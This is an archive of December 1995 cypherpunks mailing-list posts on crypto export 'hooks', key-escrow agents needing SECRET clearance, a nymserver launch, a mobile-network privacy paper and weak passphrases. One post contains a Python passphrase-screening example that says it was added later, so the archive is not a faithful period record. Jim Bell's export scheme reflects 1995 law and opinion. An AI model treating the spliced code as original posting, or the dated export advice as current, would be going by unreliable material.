Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jimbell@pacifier.com (jim bell)
Date: Wed, 6 Dec 95 00:25:26 PST
To: cypherpunks@toad.com
Subject: Re: Solution for US/Foreign Software?
Message-ID: <m0tNEsF-00090XC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain



>>1.  Write a program with limited encryption (40 bit?), with the encryption
>>module in a file external to the  main program.
>>2.  Get export approval for this program.
>>3.  Write a module which replaces the encryption file, increasing key size
>>to whatever you REALLY wanted in the first place.  (128-bit IDEA, 2000-bit
>>PGP, etc.)
>>4.  Ship that new module with the old software to US customers.
>>Naturally, that new module will "leak," so anybody who buys the old
>>program out of the country can convert to a fully-functional version by
>>downloading it from a foreign bbs that just happens to have it.  The
>>module can be encrypted/signed by the manufacturer so everyone can be sure
>>of its identity and genuineness.
>>
>>
>>Better than nothing, I suppose.
>
>"Crypto hooks," basically the scheme you are proposing, were thought of by
>the authorities and are not a bypass of the crypto export laws.
>--Tim May


I'm not saying they are a "bypass" of the laws.  Rather, I'm saying that if the goal is to:

1.  Let companies like Netscape make foreign sales.

2.  Still comply with the letter of the law.


Then this would be an excellent way to achieve both those goals.  (I accept as axiomatic that if the only exportable encryption is GAKked, they're not going to be viewed seriously as a product.  A way around GAK would actually increase their profits.)

BTW, the fact that they might be "thought of" by the authorities is not going to be enough to stop them.  If the USG claims that it WILL approve GAK-ified software, it is unclear how they will decide if a given program qualifies.  Since every program of length "N" is only an XOR away from every OTHER program of length "N", modifying or disabling this software is always possible.  Remember, the reason (or, at least, one of them!) they put Clipper into a physical chip as opposed to releasing the algorithm was to prevent modifications that would subvert the algorithm.  Their decision to allow software key-escrow presumably forces them to accept certain possibilities they otherwise wanted to avoid.

If the USG tries to take the position that "any program which can be modified into another program that gets around GAK is prohibited from export," then they're going to have to stop allowing the export of pre-formatted floppy disks because they're likewise an XOR away from PGP.

So we're back to square one:  Does the USG intend to allow ANY programs to be exported?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 5 Dec 95 22:59:09 PST
To: cypherpunks@toad.com
Subject: re: NIST GAK export meeting, sv
Message-ID: <acea7e580f021004716a@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:35 AM 12/6/95, Anonymous wrote:

>Tim May 12/5/95 6:25 PM:

>>One "defensible" (and maybe even good) reason is because someone with
>>government clearance can then be prosecuted for leaking what they know,
>>whereas ordinary citizens are harder to prosecute for this. I doubt this is
>>the main reason, but it makes a certain kind of sense.
>
>      Nice point, though I too doubt that's the reason: if *every* agent
>needed to be cleared, then this clearance stipulation would serve nicely,
>but if only *one* at every escrow agency needs to be cleared...

No, I didn't make that basic a logical blunder. What I was thinking, even
if I didn't go into it, is that the "cleared" agent would be the one within
the office who would actually handle the surveillance.

But I do think the more basic reason is really that the intelligence
agencies want a direct channel to "their" guy.

I'm really pleased to hear about the 20% attendance. Nothing trivializes a
program more than being ignored.

--Tim May


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 5 Dec 95 23:18:59 PST
To: cypherpunks@toad.com
Subject: Re: Solution for US/Foreign Software?
Message-ID: <acea846c10021004df03@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


jim bell proposes "crypto hooks":

>1.  Write a program with limited encryption (40 bit?), with the encryption
>module in a file external to the  main program.
>2.  Get export approval for this program.
>3.  Write a module which replaces the encryption file, increasing key size
>to whatever you REALLY wanted in the first place.  (128-bit IDEA, 2000-bit
>PGP, etc.)
>4.  Ship that new module with the old software to US customers.
>Naturally, that new module will "leak," so anybody who buys the old
>program out of the country can convert to a fully-functional version by
>downloading it from a foreign bbs that just happens to have it.  The
>module can be encrypted/signed by the manufacturer so everyone can be sure
>of its identity and genuineness.
>
>
>Better than nothing, I suppose.

"Crypto hooks," basically the scheme you are proposing, were thought of by
the authorities and are not a bypass of the crypto export laws.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 5 Dec 95 16:04:06 PST
To: jwarren@well.com
Subject: re: NIST GAK export meeting, sv
Message-ID: <199512052356.AAA09563@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- From Pat Farrell's <pfarrell@netcom.com> short summary of the NIST GAK
meeting (12/5/95 5:49 PM):

>My favorite policeman, Geoff Greiveldinger, then described the
>characteristics of an acceptable key escrow agent. There was a long list
>of criteria, all unseen before the meeting. The general reaction
>of the audience was that these were "yet another set of criteria that
>must be met." Geoff claimed that they were simply trying to address
>the questions raised at the earlier meeting about who is an
>acceptable escrow agent. One point that caused a lot of concern
>was that at least one employee of the escrow agent has to have a SECRET
>clearance.

      (Thanks for the summary, Pat.)
      This last bit is really rich. I can't think of a single publicly
defensible reason for the stipulation that every escrow agent must employ
someone with SECRET clearance, but I *can* think of a publicly
indefensible reason for it -- to facilitate those spooky non-court wiretap
authorizations that've been alluded to in the fine print of the GAK
proposals.

      Of course, just because escrow agents would be required to hire
*someone* with a SECRET clearance doesn't mean that *anyone* with a SECRET
clearance would fill the bill. And that's the rub: the administration of
clearing people-with-SECRET-clearances for escrow agent employment would
be conducted -- where else? -- *in secret*. SECRET clearance, of course,
wouldn't be the salient criterion; after all, there are people on the
Cypherpunks list -- and a few who aren't on it but are like-minded --
who'd be, uh, reluctant to deliver keys in the absence of a wiretap
authorized by a judge.
      And, as a petty aside, it's nice to see that the gov't had cooked up
yet another way to force potentially legitimate businesses to pay its
stoolpigeons to chip away at our civil rights.


Hieronymous


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMMTbw73g0mNE55u1AQEyPQIAsFDidHJrD7fjCee8Wa7ufj7MFnvJGYCQ
zGZR7VdtpV4IGp52SvW8UBiJjv7FeWkmwwGWD43MN/88f79MpTCO3Q==
=DOoi
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 5 Dec 95 23:49:53 PST
To: cypherpunks@toad.com
Subject: Re: The "Future" Fallacy
Message-ID: <acea8b9b110210048f27@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:24 AM 12/6/95, blancw@accessone.com wrote:
>From: Duncan Frissell
>
>Bill Gates (like Mister Newt before him) committed what I call the Future
>Fallacy in "The Road Ahead."  Page 106.
>
>"Soon any child old enough to use a computer will be able to transmit coded
>messages that no government on earth will find easy to decipher."
>...................................................
>
>
>Billg is an optimist.
>
>What's wrong with this picture, Duncan?

I found nothing wrong or incorrect with the quote Duncan attributed to Bill
Gates (I haven't read Gates' book).

I couldn't understand Duncan's koan, shrugged, and moved on.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryan Strawser <feanor@anduin.gondolin.org>
Date: Wed, 6 Dec 95 00:33:48 PST
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199512060641.BAA01380@anduin.gondolin.org>
MIME-Version: 1.0
Content-Type: text/plain


Gondolin Technologies is proud to announce a new nymserver for the online 
community at <alias@nym.gondolin.org>.

This is the same service that is presently provided to the net at 
alpha.c2.org, utilizing software written by Matt Ghio <ghio@c2.org>.

A nymserver allows any person with access to email to anonymously create an 
alias at <username@nym.gondolin.org> through which they may send/receive 
email.  This pseudonym is completely anonymous, and the identity of the 
user cannot be revealed as it is contained within a PGP encrypted reply 
block (unlike anon.penet.fi).

For more information, send a message to <help@nym.gondolin.org> and the 
help file with directions will be automatically sent to you.

The PGP public key for the alias-creation address is below:




Please direct any complaints, comments, or concerns to 
<admin@nym.gondolin.org>.

-Bryan Strawser, System/Network Administrator, Gondolin Technologies





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Wed, 6 Dec 95 03:01:18 PST
To: cypherpunks@toad.com
Subject: Re: Netscape gives in to key escrow
In-Reply-To: <199512060722.XAA25437@blob.best.net>
Message-ID: <30C56CF3.2947@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


James A. Donald wrote:
> 
> At 04:59 PM 12/4/95 -0600, Scott Brickner wrote:
> >Netscape has pretty clearly said that they don't like the idea of GAK,
> 
> Actually netscape has not said that:
> 
> Jeff has said that netscape *will* say that real soon now.

  Our representative at the NIST meeting said it there today.
It should be up on the web site in a few days when he gets
back from DC.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Loren James Rittle <rittle@comm.mot.com>
Date: Wed, 6 Dec 95 00:54:33 PST
To: cypherpunks@toad.com
Subject: Untraceability in Mobile Networks
Message-ID: <9512060854.AA12541@supra.comm.mot.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

FYI, at MobiCom '95, an ACM sponsored conference, an interesting paper
entitled, _Untraceability in Mobile Networks_, was presented.  The
authors of the paper are Didier Samfat, Refik Molva and N. Asokan.

For order info contact: acmhelp@acm.org
ACM ISBN: 0-89791-814-2
ACM Order Number: 533952

As per the ACM rule, ``Abstracting with credit is permitted,'' I
abstract ideas from the paper below.

- From the paper's abstract: ``User mobility is a feature that raises
many new security-related issues and concerns.  One of them is the
disclosure of a mobile user's real identity during the authentication
process, or other procedures specific to mobile networks.  Such
disclosure allows an unauthorized third-party to track the mobile
user's movements and current whereabouts.  Depending on the context,
access to any information related to a mobile user's location without
his consent can be a serious violation of his privacy.''

The paper, along with other ideas of interest to the Cypherpunk,
presents a classification system for arguing about the tradeoff
between user authentication, user privacy (with respect to various
entities in the network), user billing and user conveniences (such as,
``can others find the mobile user through his home agent?'') in mobile
networks.  The rest of the paper uses the classification scheme, which
really is just a convenient way of mapping all the players in the
network to the information they are allowed to ever know about a user
that has an expectation of a certain level of privacy.

The classification scheme models the following useful information
regarding users: the full identity of the user f, the identity of
the user's home domain h, and the identity of the user's current
remote domain r.

The classification scheme has the following players: User U, Home
Domain/Authority H, Remote Domain/Authority R, Legitimate Network
Entities L, and Eavesdroppers E.  They assume U always knows
everything about itself, so they ignore it from the discussion.
Notice that they model no `GAK (Government Access to Key)' or, in this
case, `GAI (Government Access to Identity)' agent.

After laying the groundwork, the authors then set about to discuss the
matrix of known information, according to their classification system,
for various interesting cases:

C1: Hiding User Identity from Eavesdroppers;
C2: Hiding User Identity from Foreign Authorities;
C3: Hiding Relationship Between the User and Authorities;
C4: Hiding the Identity of the Home Authority from Foreign Authorities; and
C5: Hiding User Behavior from Home Authority.

The cases offer more privacy from C1 to C5.  See the paper for the
exact mapping of C[1-5] to the knowledge matrix involving f, h, r
versus H, R, L, E.  The authors, quite correctly, label C5 as in
direct contrast to the intent of a ``big brother'' principle since
``no entity [other than the user] has any information about the
user.''  Attaining C5 in a system would really be the ultimate in user
location/action privacy.  The authors do not discuss the issue, but it
appears to be an open question whether, in light of a conspiracy
involving authorities, C5 could actually be attained
for a mobile user in a network.  Note: At the other end of the privacy
spectrum is the unlisted C0 case.  This corresponds exactly to the
classic cellular phone system in that nothing is hidden from
eavesdroppers.  Every relationship box on the knowledge matrix for
case C0 is set to true.

Next, the authors address how the levels of privacy affect and are
affected by other, non-security related, areas of system requirements.
For example, to make the highest levels of privacy work with
cross-authority guaranteed billing, some form of anonymous,
non-repudiable digital cash might be required.

The paper goes on to discuss how GSM, for both voice and packet data
users, and CDPD fail to even completely cover the simplest of privacy
cases, C1!

The authors construct a protocol that provides privacy levels C1 and
C2, then enhance the basic algorithm to provide a hybrid privacy level
somewhere between C4 and C5 (they do not solve all the privacy
problems present when the home and foreign authorities are involved in
a conspiracy --- they do, however, worry about foreign authorities
involved in a local conspiracy amongst themselves).

Finally, the authors give a proof of correctness for the basic
algorithm, an evaluation of its performance and compare their design
to other possible designs.  In sum, this paper is a must read for all
Cypherpunks interested in the topic of untraceability and user
identification privacy in mobile networks.  To me, the paper appears
to extend the state of the art in several directions since it applies
Chaum's, and others', ideas to mobile networks, where some tradeoffs
are different from wired, stable networks and some problems are
entirely new.

As a final aside, none of the authors could be present to give the
talk related to the paper, so the advisor of one of the students, Jay
Black of the University of Waterloo, gave the talk.  He mentioned that
he did not understand why this area of research was important.
Apparently, he has never heard the Cypherpunks' privacy message.
However, he was quite a good sport about presenting the paper.  Later,
in the question period --- a guy, later outed as with the
U. S. government --- raised the same issue in a more hostile tone.
All I can say to the unknown G-Man, ``Are you totally clueless?  This
is a country that was founded upon the principles of anonymous speech
and one's right to privacy.  It is about time that the people restore
these lost freedoms through technology alone, if possible, or on the
political scene, if required.''

Regards,
Loren

- -- 
Loren J. Rittle (rittle@comm.mot.com)	PGP KeyIDs: 1024/B98B3249 2048/ADCE34A5
Systems Technology Research (IL02/2240)	FP1024:6810D8AB3029874DD7065BC52067EAFD
Motorola, Inc.				FP2048:FDC0292446937F2A240BC07D42763672
(708) 576-7794				Call for verification of fingerprints.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMMVZ+/8de8m5izJJAQFL9AQAhwzqlJK4fnsnCs09XO7Mnhfej1z+eHrQ
ALhAVNSYphH1qvLAM4veRr+Af+XoP0QO7s6GXu+IHlR5b0r8Qy9qKw5XeIeGra4d
wuqrVngKAd6Pm0G2Gdj6+4ERoNJL9xwIvfswUyMNAai8K+rnqBE9F/yTTRn363T+
dT9CkMq+Wqs=
=MP9H
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Wed, 6 Dec 95 01:15:34 PST
To: tcmay@got.net (Timothy C. May)
Subject: Re: The "Future" Fallacy
In-Reply-To: <acea8b9b110210048f27@[205.199.118.202]>
Message-ID: <199512060918.DAA06957@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


Duncan Frissell quotes Bill Gates:
>"Soon any child old enough to use a computer will be able to transmit coded
>messages that no government on earth will find easy to decipher."

blancw@accessone.com responds:
>Billg is an optimist.
>
>What's wrong with this picture, Duncan?

Then Tim May says: 
> I found nothing wrong or incorrect with the quote Duncan attributed to Bill
> Gates (I haven't read Gates' book).
>
> I couldn't understand Duncan's koan, shrugged, and moved on.


I don't know what blancw was getting at, but I'll take up his side of the
argument.  Can good security really be automated so well that people will
have it without thinking about it? 

I create accounts at an ISP, and 90% of the people who walk in the door
pick terrible passwords, even after listening to a little speech about
what makes a good one.  I'd be willing to bet that more than half the
people using PGP have passphrases that would fall quickly to a dictionary
attack. 

The child in billg's example might have a giant key sitting on the hard
drive, but it's either going to be sitting there in the clear or protected
by a passphrase.  Will the child pick a good passphrase?

One of the most important arguments we can make against government control
of crypto is that the claims of impenetrability are being oversold on both
sides of the debate.  If the NSA wanted my PGP key badly, they'd have it
and I wouldn't know it.  I can think of lots of ways they could get it,
and I'm not nearly as clever as they are.

Good algorithms and protocols aren't enough:  you need good human
discipline.  The best software in the world won't help me if my passphrase
is "alex1" -- and that's what 25% of the people named Alex will set it to,
providing that you impose the restriction that passphrases must have a
non-alphabetic character.

There's an enormous difference between the amount of care that people in
the intelligence business and casual crypto users take with keys.  Are the
spooks wasting time and energy?  I don't think so -- that's what it 
takes to minimize your risks.  Do I do it?  No.  If someone swapped my 
pgp binary, I'd never know it.

Crypto won't protect us absolutely from surveillance, but it will do a 
very good job of protecting us from automated surveillance.  Right now, 
phones are wiretapped for next to nothing.  If I have a friend who sells 
drugs and I speak with him on the phone frequently, I can get on the 
list.  If they hear something on my phone that keeps them interested, 
another friend of mine can get put on the list as well.  It spreads like 
a viral infection.

That's the sort of thing crypto will put a stop to.  If they want my key, 
they'll be able to grab it.  But it won't be practical for them to grab 
the keys of the ten people I correspond with most just because they 
correspond with me.
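
The point above about "alex1" passing a "must contain a non-alphabetic character" rule, shown as an added example that is not part of the original post: a composition rule accepts the passphrase, while a screen that strips decoration and compares against identity tokens and a word list rejects it. The word list, the identity tokens, the 12-character minimum and all function names are assumptions made for this illustration.

```python
import re

# Constructed sample data: a tiny stand-in for a real word list.
COMMON_WORDS = {"password", "secret", "letmein", "dragon", "qwerty"}

# Undo the usual look-alike substitutions before comparing.
_LEET = str.maketrans("013457@$!", "oieastasi")
# Digits and symbols glued to the front or back of a word.
_EDGE_DECORATION = re.compile(r"^[^a-z]+|[^a-z]+$")


def composition_rule_ok(passphrase):
    """The rule from the message: at least one non-alphabetic character."""
    return any(not ch.isalpha() for ch in passphrase)


def _cores(passphrase):
    """Lowercased passphrase with edge decoration removed, raw and de-leeted."""
    core = _EDGE_DECORATION.sub("", passphrase.lower())
    return {core, core.translate(_LEET)}


def screen_passphrase(passphrase, user_tokens=(), min_length=12):
    """Return the sorted reasons to reject; an empty list means it passed.

    user_tokens are strings tied to the account (login, first name, ...).
    min_length=12 is an assumed policy value, not a figure from the post.
    """
    reasons = set()
    if len(passphrase) < min_length:
        reasons.add("too short")
    tokens = {t.lower() for t in user_tokens if len(t) >= 3}
    for core in _cores(passphrase):
        if core in COMMON_WORDS:
            reasons.add("dictionary word with decoration")
        if any(tok in core for tok in tokens):
            reasons.add("derived from account identity")
    return sorted(reasons)


if __name__ == "__main__":
    # Constructed inputs for an account whose owner is named Alex.
    for candidate in ("alex1", "P@ssw0rd1234", "violet-tram-ochre-97-kelp"):
        print(candidate,
              "| composition rule:", composition_rule_ok(candidate),
              "| screen:", screen_passphrase(candidate, ["alex", "strasheim"]))
```
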




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wlkngowl@unix.asb.com (Mutatis Mutantdis)
Date: Sun, 10 Dec 95 22:16:16 PST
Subject: Re: [Mix-L] WARNING: sting via remailer! (fwd)
In-Reply-To: <199512051407.JAA18236@copper.ucs.indiana.edu>
Message-ID: <DJ5Bun.4Cu@news2.new-york.net>
MIME-Version: 1.0
Content-Type: text/plain


Bryan Strawser <bstrawse@copper.ucs.indiana.edu> wrote:

>Forwarded message:
[..]
>> 	I was in the federal building coffee shop in Reston, Va. yesterday
>> when I overheard a conversation between what appeared to be two FBI agents
>> discussing a sting operation involving Mixmaster. Hearing the word
>> "mixmaster" naturally caused my ears to perk up and I listened further. 
>> 
>> 	It appears that the FBI has coerced a mixmaster remailer operator
>> into cooperating with them in a sting operation to catch remailers when
>> they forward email pertaining to pornography, pedophilia, and copy-written
>> software. 

Not that such a thing is impossible, but it seems awfully suspicious
that FBI agents would be talking about a case within earshot of the
general public...
 
--Mutant Rob






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 6 Dec 95 01:29:24 PST
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: The "Future" Fallacy
In-Reply-To: <acea8b9b110210048f27@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.951206042314.18935A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 6 Dec 1995, Timothy C. May wrote:

> At 7:24 AM 12/6/95, blancw@accessone.com wrote:
> >From: Duncan Frissell
> >
> >Bill Gates (like Mister Newt before him) committed what I call the Future
> >Fallacy in "The Road Ahead."  Page 106.
> >
> >"Soon any child old enough to use a computer will be able to transmit coded
> >messages that no government on earth will find easy to decipher."
> >...................................................
> >
> >
> >Billg is an optimist.
> >
> >What's wrong with this picture, Duncan?
> 
> I found nothing wrong or incorrect with the quote Duncan attributed to Bill
> Gates (I haven't read Gates' book).
> 
> I couldn't understand Duncan's koan, shrugged, and moved on.
> 

I think Duncan was mad at the 'soon.'  Why not today?

> --Tim May
> 
> Views here are not the views of my Internet Service Provider or Government.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> Corralitos, CA              | knowledge, reputations, information markets,
> Higher Power: 2^756839      | black markets, collapse of governments.
> "National borders are just speed bumps on the information superhighway."
> 
> 
> 

---
My preferred and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 5 Dec 95 19:33:59 PST
To: cypherpunks@toad.com
Subject: re: NIST GAK export meeting, sv
Message-ID: <199512060335.EAA20054@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Tim May 12/5/95 6:25 PM:


>>      This last bit is really rich. I can't think of a single publicly
>>defensible reason for the stipulation that every escrow agent must employ
>>someone with SECRET clearance,    <<etc.>>
>
>One "defensible" (and maybe even good) reason is because someone with
>government clearance can then be prosecuted for leaking what they know,
>whereas ordinary citizens are harder to prosecute for this. I doubt this is
>the main reason, but it makes a certain kind of sense.

      Nice point, though I too doubt that's the reason: if *every* agent
needed to be cleared, then this clearance stipulation would serve nicely,
but if only *one* at every escrow agency needs to be cleared...

>But there are other more interesting links between Secret clearances and
>wiretaps.
>
>The "Foreign Intelligence Surveillance Court" meets in Arlington, VA as the
>need arises to authorize wiretaps in private, <interesting but etc.>

>>      Of course, just because escrow agents would be required to hire
>>*someone* with a SECRET clearance doesn't mean that *anyone* with a SECRET
>>clearance would fill the bill. <etc.>

>Many think tanks and defense contractors have "sheep-dipped" retired
>intelligence officials working for them and continuing to report (in
>various ways) to their former paymasters.
>
>Sometimes these sheep-dipped agents are just there to keep tabs on what's
>going on, sometimes they're there to nudge these companies in certain
>directions, and sometimes they are actually running "deniable" applications
>from the private sector. (Recall Hughes, Air America, Castle Bank, etc.)
>
>I can imagine that if some companies talked about in connection with
>certain questionable activities (Banker's Trust, Bank of America,
>Wackenhut, SAIC, etc.) were to bid for the contract to be a GAK Agent, then
>there would be contacts back to the intelligence agencies.

      Organizations like SAIC seem like "naturals" for GAK escrow agents
-- and they're a foregone conclusion as far as spookery is concerned. What
troubles me is the suggestion that *every* agent *must* hire someone who
might answer to a higher authority, as it were. And what troubles me more
is watching this paragovernment's transparent efforts to reproduce itself
step by step, always trying to elude efforts to make it accountable or
subordinate to civil authorities.

>But most GAK accesses would be handled through normal channels, albeit secret.

      Of course. But most cops and prosecutors haven't developed the
"national security" verbal tic. Yet.

      GAK stinks, but this security-clearance stipulation *really* stinks.
      Of course, I'm preaching to the choir...

Hieronymous

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMMUMXL3g0mNE55u1AQHR0wIAj/86ga/1T0FJ7gZt5ZVwlCLt4pq2g0Nt
QpoDWlul6q9ub51k3wwA6Kn1np3NMoYpjLS/bdPew0XUBMJpQs/l/Q==
=AdMm
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 5 Dec 95 20:44:07 PST
To: cypherpunks@toad.com
Subject: re: Secret Clearance
Message-ID: <199512060445.FAA22949@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 9:00 PM 12/5/95, Pete Loshin wrote:

>I'm definitely opposed to GAK, but the conspiracy theory approach to
>considering what it means to employ people with SECRET clearance
>may be getting a bit paranoid.

      In a discussion of governmental efforts to deny presumedly innocent
citizens the assurance that they can conduct their affairs in privacy --
and to require that "trusted," "impartial" escrow agents employ someone
who has been vetted according to undisclosed criteria, the best you can
come up with is this "conspiracy theory" saw? Did *I* invent this
stipulation?

>From working at an organization that did a lot of government work,
>my understanding of the process of clearing employees is this:
>
>-certain tasks require knowledge or access that must be restricted
>-you have to have a high degree of trust in the people doing those tasks
>-people with money troubles, out-of-control addictions, skeletons in the
> closet, and histories of "troubles" are prime targets for subversion
>-doing a clearance check (in theory) eliminates the possibility that
> these people will be blackmailed/bribed into revealing their secrets

      Therefore, *every* GAK escrow agent *must* employ someone with an
arbitrary clearance level?

>Not that this stuff always works in practice, considering that Aldrich
>Ames <etc.>

      And what protected him? Incompetence, cronyism, corruption, and
ass-covering. Of course, any failures in GAK administration would be
handled differently...

>The point is, if you want to keep your organization's systems secure,
>you need some mechanism to do so. Security clearance is one way;
>banks and other financial institutions do other things (like finger prints,
>background checks, etc.)

      I get the point. I *disagree* with it.

>My big question is, do any of the companies providing Internet services,
>or Internet software, or digital commerce services/software, employ
>any of these security mechanisms on their employees? Comments or
>(preferably) references to actual practices?

      On the *hardware* front, definitely -- if not by law then simply by
practical need. Does the hardware in question *necessarily* apply to every
citizen in America?

Hieronymous

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMMUfVr3g0mNE55u1AQE2AwH+Ps6ux/T/jME+yz6NEr2hC02m2j1TalGr
/hfzvIGytpAE3Ld6f0ltjz70RbSFb4mFX1oPbNnDVwDsPo5iSstEiw==
=4PcI
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Holovacs <holovacs@styx.ios.com>
Date: Wed, 6 Dec 95 03:53:25 PST
To: cypherpunks@toad.com
Subject: Re: Solution for US/Foreign Software?
In-Reply-To: <m0tNEsF-00090XC@pacifier.com>
Message-ID: <Pine.3.89.9512060649.A22538-0100000@styx.ios.com>
MIME-Version: 1.0
Content-Type: text/plain


One potential "clean room" solution would be to publish precise interface 
specifications for the product. Overseas vendors and users could produce 
their own patches that match the interface. This is of course a kind of 
"hook", and the gov may sabre-rattle about it but I doubt it will stand 
up in court. Certainly publishing specs is no different than publishing 
"Applied Cryptography".
 

Jay Holovacs <holovacs@ios.com>
PGP Key fingerprint =  AC 29 C8 7A E4 2D 07 27  AE CA 99 4A F6 59 87 90 
 (KEY id 1024/80E4AA05) email me for key




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Holovacs <holovacs@styx.ios.com>
Date: Wed, 6 Dec 95 04:01:50 PST
To: cypherpunks <cypherpunks@toad.com>
Subject: re: Secret Clearance
In-Reply-To: <199512060445.FAA22949@utopia.hacktic.nl>
Message-ID: <Pine.3.89.9512060640.A22538-0100000@styx.ios.com>
MIME-Version: 1.0
Content-Type: text/plain


I think it's interesting that police and even FBI that normally operate 
"legally authorized" wiretaps do not require SECRET clearance. What 
really goes on here?

Jay Holovacs <holovacs@ios.com>
PGP Key fingerprint =  AC 29 C8 7A E4 2D 07 27  AE CA 99 4A F6 59 87 90 
 (KEY id 1024/80E4AA05) email me for key




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Wed, 6 Dec 95 04:10:19 PST
To: cypherpunks@toad.com
Subject: Re: NIST GAK export meeting, short version
Message-ID: <25879.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Just a quick note to explain what the govies claimed was the reason for
the SECRET clearance....

They claimed it was needed so that they can serve a court order
that is SECRET. Obviously, if the order is classified, then no one
without clearance can see it -- the existence of the clearance
is classified.

The main area that they claimed was for FISA orders. FISA stands
for something like Foreign Intelligence Surveillance Act. It is
aimed at catching spies.

The whole topic raises a ton of questions, such as traffic
analysis when your _only_ cleared operator has to process
a request. Plus, since you have to be a US citizen to get
a clearance, how can there be approved foreign escrow agents?

And the usual, why in hell would a competent spy use
crypto escrowed in the US?

I'll put more in the long report.

Pat

Pat Farrell    Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Wed, 6 Dec 95 04:20:35 PST
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Geodesic Payment Systems? (was Re: Meeting notes from ANSI X.9 Meeting on Electronic Payment)
In-Reply-To: <01HYG84E8ZRU9S3QKQ@mbcl.rutgers.edu>
Message-ID: <wklMcgyMc50eEbskld@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail.nonpersonal: 5-Dec-95 Re: Geodesic Payment System..
"E. ALLEN SMITH"@mbcl.ru (2487)

